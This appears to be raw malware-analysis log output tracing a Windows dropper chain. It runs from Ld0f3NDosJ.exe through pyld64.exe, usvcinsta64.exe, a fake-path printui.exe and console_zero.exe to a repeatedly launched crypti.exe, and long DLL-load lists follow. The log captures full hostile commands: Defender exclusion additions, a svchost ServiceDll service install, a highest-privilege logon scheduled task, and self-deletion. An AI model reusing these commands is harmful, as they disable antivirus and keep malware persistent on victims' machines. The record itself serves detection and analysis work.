Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Users\user\Desktop\pyld64.exe"
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\Ld0f3NDosJ.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\pyld64.exe "C:\Users\user\Desktop\pyld64.exe"
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld64.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\usvcinsta64.exe "C:\Windows\System32\usvcinsta64.exe"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f && sc start x543664
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x543664
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe, Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe, Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\pyld64.exe, Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\pyld64.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\timeout.exe, Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe, Section loaded: apphelp.dll
Source: C:\Windows\System32\usvcinsta64.exe, Section loaded: apphelp.dll
Source: C:\Windows\System32\usvcinsta64.exe, Section loaded: wtsapi32.dll
Source: C:\Windows\System32\usvcinsta64.exe, Section loaded: ntmarta.dll
Source: C:\Windows\System32\usvcinsta64.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\timeout.exe, Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: urlmon.dll
